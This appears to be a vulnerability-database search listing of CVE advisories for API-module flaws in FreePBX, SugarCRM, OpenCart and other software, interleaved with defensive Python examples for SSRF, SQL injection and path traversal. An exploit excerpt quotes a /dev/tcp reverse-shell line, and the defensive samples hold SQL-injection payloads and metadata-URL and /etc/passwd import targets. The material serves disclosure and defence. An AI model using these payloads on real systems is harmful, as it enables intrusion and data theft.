82 matches found

Positive Technologies
added 2025/09/04 12:00 a.m. · 6 views

PT-2025-36101

Name of the Vulnerable Software and Affected Versions: FreePBX versions prior to 15.0.13; FreePBX versions 16.0.2 through 16.0.14; FreePBX versions 17.0.1 and 17.0.2. Description: The api module for FreePBX, an open-source GUI for Asterisk, is susceptible to an issue where a shared OAuth private key...

CVSS 5.1 · AI score 6.5 · EPSS 0.00089
Exploits 0 · References 6
NVD
added 2025/07/15 8:15 a.m. · 5 views

CVE-2025-7672

The improper default setting in JiranSoft CrossEditor4 on Windows, Linux, and Unix API modules potentially allows Stored XSS. This issue affects CrossEditor4: from 4.0.0.01 before 4.6.0.23...

CVSS 4.3 · EPSS 0.00148
Exploits 0 · References 1
RedhatCVE
added 2025/07/15 12:21 a.m. · 9 views

CVE-2024-58258

SugarCRM before 13.0.4 and 14.x before 14.0.1 allows SSRF in the API module because a limited type of code injection can occur...

CVSS 7.2 · AI score 7.7 · EPSS 0.0224
Exploits 3 · References 1
NVD
added 2025/07/13 10:15 p.m. · 4 views

CVE-2024-58258

SugarCRM before 13.0.4 and 14.x before 14.0.1 allows SSRF in the API module because a limited type of code injection can occur...

CVSS 7.2 · EPSS 0.0224
Exploits 3 · References 2
CVE
added 2025/07/13 12:00 a.m. · 24 views

CVE-2024-58258

SugarCRM has a code injection flaw (CVE-2024-58258) in versions before 13.0.4 and 14.x before 14.0.1. The vulnerability arises from improper sanitization of user-supplied GET parameters in the /css/preview API, which is parsed as LESS and can be abused via @import to trigger SSRF and local file d...

CVSS 7.2 · AI score 7.6 · EPSS 0.0224
Exploits 3 · References 2
Vulnrichment
added 2025/07/13 12:00 a.m. · 2 views

CVE-2024-58258

SugarCRM before 13.0.4 and 14.x before 14.0.1 allows SSRF in the API module because a limited type of code injection can occur...

CVSS 7.2 · AI score 7.6 · EPSS 0.0224
Exploits 3 · References 1
Cvelist
added 2025/07/13 12:00 a.m. · 9 views

CVE-2024-58258

SugarCRM before 13.0.4 and 14.x before 14.0.1 allows SSRF in the API module because a limited type of code injection can occur...

CVSS 7.2 · EPSS 0.0224
Exploits 3 · References 1
Positive Technologies
added 2025/07/13 12:00 a.m. · 5 views

PT-2025-29387 · Sugarcrm

Name of the Vulnerable Software and Affected Versions: SugarCRM versions prior to 13.0.4; SugarCRM versions 14.x prior to 14.0.1. Description: The software contains a Server-Side Request Forgery (SSRF) issue in the API module due to a limited type of code injection. Recommendations: Update to SugarCR...

CVSS 7.2 · AI score 6.6 · EPSS 0.0224
Exploits 3 · References 8
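The SugarCRM entries above describe request parameters being parsed as LESS, where an `@import` can make the server fetch a remote URL or read a local file. The block below is an added example, not SugarCRM code and not part of any of the database entries on this page, of a pre-compilation guard that rejects every `@import` whose target is not a relative path under an assumed theme directory. The `ALLOWED_IMPORT_DIR` policy, the regex, the rejection labels and the sample stylesheet are all constructed for the illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Assumed policy for this illustration: the only legitimate @import targets are
# relative paths under the theme directory of the compiler's working directory.
ALLOWED_IMPORT_DIR = "themes/"

# LESS @import statement: optional option list such as "(inline)" or
# "(reference)", then a quoted path or url(...) target, terminated by ';'.
_IMPORT_RE = re.compile(
    r"""@import\s*(?:\(([^)]*)\))?\s*(?:url\(\s*)?["']?([^"'()\s;]+)["']?\s*\)?\s*;""",
    re.IGNORECASE,
)


def classify_import_target(target):
    """Return None for an acceptable import target, otherwise a short rejection reason."""
    if "@{" in target:
        # Variable interpolation: the final path is only known at compile time,
        # so it cannot be vetted statically.
        return "interpolated-path"
    scheme = urlsplit(target).scheme
    if scheme:
        # http://, https://, file://, data:, ftp:// ... fetched server-side,
        # this is the SSRF / local-file-read primitive.
        return "scheme:" + scheme.lower()
    if target.startswith("//"):
        return "protocol-relative"
    if target.startswith("/"):
        return "absolute-path"
    # Normalise *before* the directory test so "themes/../../x" is caught.
    normalized = posixpath.normpath(target.replace("\\", "/"))
    if normalized == ".." or normalized.startswith("../"):
        return "path-traversal"
    if not normalized.startswith(ALLOWED_IMPORT_DIR):
        return "outside-allowed-dir"
    return None


def audit_less(source):
    """Return (target, options, reason) for every @import that must not reach the compiler."""
    findings = []
    for match in _IMPORT_RE.finditer(source):
        options = (match.group(1) or "").strip()
        target = match.group(2)
        reason = classify_import_target(target)
        if reason is not None:
            findings.append((target, options, reason))
    return findings


def is_safe_less(source):
    return not audit_less(source)


# Constructed sample of what a user-controlled stylesheet parameter might carry.
SAMPLE_LESS = """
@import "themes/default/variables.less";
@import (reference) "themes/default/mixins.less";
@import url("http://169.254.169.254/latest/meta-data/");
@import (inline) "/etc/passwd";
@import "../../config.php";
@import "themes/../../../etc/hosts";
@import "@{base}/extra.less";
.preview { color: @brand; }
"""

if __name__ == "__main__":
    for target, options, reason in audit_less(SAMPLE_LESS):
        print(f"REJECT {reason:<20} options={options or '-':<10} {target}")
```

The ordering matters: a scheme check alone would pass `themes/../../../etc/hosts`, so the path is normalised before the directory test, and in LESS an `(inline)` import embeds the target verbatim in the output, which is why an unsafe target there is direct file disclosure rather than a failed parse. A guard like this is a stop-gap; the durable fix is not to let request parameters reach the compiler as stylesheet source at all.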
RedhatCVE
added 2025/05/23 11:38 a.m. · 8 views

CVE-2025-0580

A vulnerability was found in Shiprocket Module 3 on OpenCart. It has been rated as critical. Affected by this issue is some unknown functionality of the file /index.php?route=extension/module/restapi=getOrders of the component REST API Module. The manipulation of the argument contentHash leads to...

CVSS 6.3 · AI score 6.7 · EPSS 0.00109
Exploits 0 · References 1
RedhatCVE
added 2025/05/22 7:56 p.m. · 5 views

CVE-2021-36129

An issue was discovered in the Translate extension in MediaWiki through 1.36. The Aggregategroups Action API module does not validate the parameter for aggregategroup when action=remove is set, thus allowing users with the translate-manage right to silently delete various groups' metadata...

CVSS 4.3 · AI score 6.8 · EPSS 0.00105
Exploits 1 · References 1
RedhatCVE
added 2025/05/22 1:17 a.m. · 5 views

CVE-2015-2197

Cross-site scripting (XSS) vulnerability in the Entity API module before 7.x-1.6 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via a field label in the Token API...

CVSS 3.5 · AI score 5.5 · EPSS 0.00209
Exploits 0 · References 1
NVD
added 2025/01/20 3:15 a.m. · 8 views

CVE-2025-0579

A vulnerability was found in Shiprocket Module 3/4 on OpenCart. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /index.php?route=extension/shiprocket/module/restapi of the component REST API Module. The manipulation of the argument x-userna...

CVSS 7.5 · EPSS 0.00071
Exploits 0 · References 4
CVE
added 2025/01/20 2:31 a.m. · 88 views

CVE-2025-0579

CVE-2025-0579 affects Shiprocket Module 3/4 on OpenCart, specifically the REST API Module’s restapi endpoint. The root cause is manipulation of the x-username parameter, leading to SQL injection that can be exploited remotely. Public exploitation has been disclosed. Affected versions are Shiprock...

CVSS 7.5 · AI score 7.5 · EPSS 0.00071
Exploits 0 · References 4
Positive Technologies
added 2025/01/19 12:00 a.m. · 5 views

PT-2025-3970 · Opencart +1

Name of the Vulnerable Software and Affected Versions: Shiprocket Module 3/4 on OpenCart, affected versions not specified. Description: A critical issue has been found in the Shiprocket Module 3/4 on OpenCart, affecting an unknown functionality of the file...

CVSS 7.5 · AI score 7.8 · EPSS 0.00071
Exploits 0 · References 12
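The OpenCart entries above report SQL injection through the `x-username` value handled by the REST API module. As an added example, not the Shiprocket module's own code, the block below shows the anti-pattern (splicing the header value into the query text) beside a parameterized query and an input allowlist, run against a constructed SQLite table that stands in for whatever the real module queries. The table, its columns, the validator's character set and both payloads are assumptions made for the demonstration.

```python
import re
import sqlite3


def build_demo_db():
    """Constructed stand-in schema; the real module's tables are not shown on this page."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE api_user (id INTEGER PRIMARY KEY, username TEXT NOT NULL, api_key TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO api_user (username, api_key) VALUES (?, ?)",
        [("shop_admin", "k-1111"), ("warehouse", "k-2222")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn, x_username):
    """The anti-pattern: the header value becomes part of the SQL text."""
    sql = "SELECT username FROM api_user WHERE username = '" + x_username + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, x_username):
    """Parameterized query: the driver sends the value separately, so it never becomes SQL syntax."""
    sql = "SELECT username FROM api_user WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (x_username,))]


# Assumed username shape for the allowlist; tighten to the real identifier format.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")


def validate_header(x_username):
    """Defense in depth: refuse anything that is not a plausible username before the query layer."""
    return bool(USERNAME_RE.match(x_username))


# Constructed payloads. The first closes the quoted literal and ORs in a
# tautology (authentication bypass); the second UNIONs a second SELECT onto the
# statement to pull a different column out (data exfiltration).
TAUTOLOGY = "nobody' OR '1'='1"
UNION_EXFIL = "nobody' UNION SELECT api_key FROM api_user WHERE '1'='1"

if __name__ == "__main__":
    conn = build_demo_db()
    print("vulnerable, tautology:", find_user_vulnerable(conn, TAUTOLOGY))
    print("vulnerable, union:    ", find_user_vulnerable(conn, UNION_EXFIL))
    print("safe, tautology:      ", find_user_safe(conn, TAUTOLOGY))
    print("validator accepts:    ", validate_header(TAUTOLOGY), validate_header("shop_admin"))
```

The parameterized form is the fix; the allowlist is only a second layer, useful because it also shuts out payloads aimed at other sinks the same value may reach (logging, shell commands, a second query built elsewhere).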
CNVD
added 2024/07/09 12:00 a.m. · 7 views

MediaWiki suffers from an unspecified vulnerability (CNVD-2024-31368)

MediaWiki is a suite of free and freely available web-based Wiki engines from the MediaWiki Foundation. It can be used to deploy in-house knowledge management and content management systems. MediaWiki suffers from a security vulnerability that stems from possible cross-site request forgery (CSRF) i...

CVSS 6.5 · AI score 6.9 · EPSS 0.00065
Exploits 0 · References 1
CNNVD
added 2024/07/07 12:00 a.m. · 1 view

MediaWiki security vulnerability

MediaWiki is a suite of free and freely available web-based Wiki engines from the MediaWiki Foundation. It can be used to deploy in-house knowledge management and content management systems. MediaWiki suffers from a security vulnerability that stems from possible cross-site request forgery (CSRF) i...

CVSS 6.5 · AI score 6.8 · EPSS 0.00065
Exploits 0 · References 2
Exploit DB
added 2024/06/01 12:00 a.m. · 333 views

FreePBX 16 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: FreePBX 16 - Remote Code Execution (RCE) (Authenticated) Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ >& /dev/tcp/'.$backconnectip.'/4444 0>&1'; curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); ec...

AI score 7.4
Exploits 0
NVD
added 2024/04/24 8:15 a.m. · 10 views

CVE-2024-28976

Dell Repository Manager, versions prior to 3.4.5, contains a Path Traversal vulnerability in API module. A local attacker with low privileges could potentially exploit this vulnerability to gain unauthorized write access to the files stored on the server filesystem with the privileges of the...

CVSS 8.8 · AI score 8.7 · EPSS 0.00059
Exploits 0 · References 1
Cvelist
added 2024/04/24 8:10 a.m. · 12 views

CVE-2024-28976

Dell Repository Manager, versions prior to 3.4.5, contains a Path Traversal vulnerability in API module. A local attacker with low privileges could potentially exploit this vulnerability to gain unauthorized write access to the files stored on the server filesystem with the privileges of the...

CVSS 8.8 · AI score 8.7 · EPSS 0.00059
Exploits 0 · References 1
CVE
added 2024/04/24 8:10 a.m. · 80 views

CVE-2024-28976

Dell Repository Manager is affected by a Path Traversal vulnerability in the API module, impacting versions prior to 3.4.5. The root cause is path traversal that could allow a local attacker with low privileges to gain unauthorized write access to files on the server filesystem with the web appli...

CVSS 8.8 · AI score 6.5 · EPSS 0.00059
Exploits 0 · References 1 · Affected Software 1
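The Dell Repository Manager entries above describe a path traversal in an API module that yields write access with the web application's privileges. The block below is an added example, not Dell's code, of the containment check such an API needs before it touches the filesystem: canonicalize the base directory and the joined path, then require the result to stay under the base. The repository layout, the file names and the `write_into_repo` helper are constructed for the demonstration; the symlink case is there to show why filtering `..` lexically is not enough.

```python
import os
import shutil
import tempfile


class PathEscape(ValueError):
    """Raised when a client-supplied path would resolve outside the repository root."""


def resolve_within(base_dir, user_path):
    """Map a client-supplied relative path onto base_dir, refusing any escape.

    Both sides go through realpath so that '..', redundant separators and
    symlinks are resolved *before* the containment test, and commonpath is used
    instead of a string-prefix check so that "/srv/repo2" is not mistaken for
    something under "/srv/repo".
    """
    base = os.path.realpath(base_dir)
    if "\x00" in user_path:
        raise PathEscape("embedded NUL byte")
    if os.path.isabs(user_path):
        # os.path.join(base, "/etc/passwd") would silently discard base.
        raise PathEscape("absolute paths are not allowed")
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise PathEscape(f"{user_path!r} resolves outside {base}")
    return candidate


def is_contained(base_dir, user_path):
    try:
        resolve_within(base_dir, user_path)
        return True
    except PathEscape:
        return False


def write_into_repo(base_dir, user_path, data):
    """The hardened write: proceeds only once the path has been contained."""
    target = resolve_within(base_dir, user_path)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def demo():
    """Exercise benign, traversal, absolute and symlink inputs; return name -> outcome."""
    base = tempfile.mkdtemp(prefix="repo-")
    outside = tempfile.mkdtemp(prefix="outside-")
    cases = {
        "benign": "catalog/2024/pkg.bin",
        "dotdot": "../../../etc/passwd",
        "nested_dotdot": "catalog/../../escape.bin",
        "absolute": "/etc/passwd",
    }
    outcomes = {}
    try:
        try:
            # A symlink inside the repo pointing outside it: only realpath sees this.
            os.symlink(outside, os.path.join(base, "link"))
            cases["symlink"] = "link/escape.bin"
        except (OSError, NotImplementedError):
            pass  # symlinks unavailable (e.g. unprivileged Windows); skip that case
        for name, path in cases.items():
            try:
                write_into_repo(base, path, b"demo")
                outcomes[name] = "written"
            except PathEscape:
                outcomes[name] = "rejected"
    finally:
        shutil.rmtree(base, ignore_errors=True)
        shutil.rmtree(outside, ignore_errors=True)
    return outcomes


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:<14} {outcome}")
```

The check is still subject to a race: a symlink created between `resolve_within` and the `open` can redirect the write, so where the platform allows it, open the file with `O_NOFOLLOW` (or write through a directory file descriptor with `os.open(..., dir_fd=...)`) in addition to the containment test.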